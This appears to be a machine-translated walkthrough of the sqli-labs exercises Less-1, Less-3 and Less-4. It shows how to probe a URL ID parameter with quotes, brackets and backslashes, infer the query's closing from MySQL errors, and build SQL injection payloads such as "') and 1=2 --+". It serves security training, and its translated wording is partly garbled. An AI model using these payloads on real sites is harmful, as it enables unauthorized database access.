Modify the corresponding ID value in the URL to normal numbers, large numbers, characters (single quotes, double quotes, double single quotes, brackets), backslash \ to detect whether there is an injection point in the URL
Less-1 (closed with single quotes)
Throw a single quote at random to make him report an error
copy the content out
error statement
''3'' LIMIT 0,1'
' '3'' LIMIT 0,1 '
The first is the single quotation mark that comes with the output statement, the ' on the left and right sides, no matter what
'3'' LIMIT 0,1
First remove the built-in output on the left and right sides, and now only the ' single quotes that come with the character type are left
3'
user input
Guess the sql statement Select login_name,password from admin where id='3'' limit 0,1
Judge his closing method as'
Less-3 (single quotes and parentheses)
Just drop a single quote in it
error message
''3'') LIMIT 0,1'
' '3'') LIMIT 0,1 '
The first is the single quotation mark that comes with the output statement, the ' on the left and right sides, no matter what
'3'') LIMIT 0,1
First remove the built-in output on the left and right sides, and now only the ' single quotes and brackets that come with the character type are left
3') LIMIT 0,1
User input, we need to close this bracket
(‘3 ’’)LIMIT 0,1
We need to write such a bracket by default in the program to close what we wrote
Guess the sql statement Select login_name,password from admin where id=('3'') limit 0,1
injection statement
First use ') to close and 1=1
Using and1=2
guess sql statement
before closing
Guess the sql statement Select login_name,password from admin where id=('3' and 1=2') limit 0,1
After using closure:
Guess the sql statement Select login_name,password from admin where id=('3') and 1=2 ---+ ') limit 0,1
The number 3 is not in the brackets, use the ') closure we entered in advance, and comment out the ') closure that comes with it
Less-4 (use double quotes and parentheses to close)
Throwing a single quotation mark into it does not respond
Using ') still does not respond
Still the page is normal
The reason is because (" ") double quotes and brackets are used here to filter
User input becomes " 3')))))"
The reason is because it is wrapped in double quotes. In mysql, it will treat the content we input as an invisible conversion, and automatically convert the result we input into 3, so no matter what page we input, it will be echoed normally. of. But typing \he will not work
We can then use the /slash
Reported an error
error message
'"3\") LIMIT 0,1'
' "3\") LIMIT 0,1 '
The first is the single quotation mark that comes with the output statement, the ' on the left and right sides, no matter what
"3\") LIMIT 0,1
First remove the output on the left and right sides, and now only the "double quotes and brackets that come with the character type are left
3\) LIMIT 0,
User input, we need to close this bracket
(“3\”)
We need to write such a bracket by default in the program to close what we wrote
Guess the sql statement Select login_name,password from admin where id=(“3\”) limit 0,1
Construct SQL statement:
Select login_name,password from admin where id=(“3”) and 1=2 --+”) limit 0,1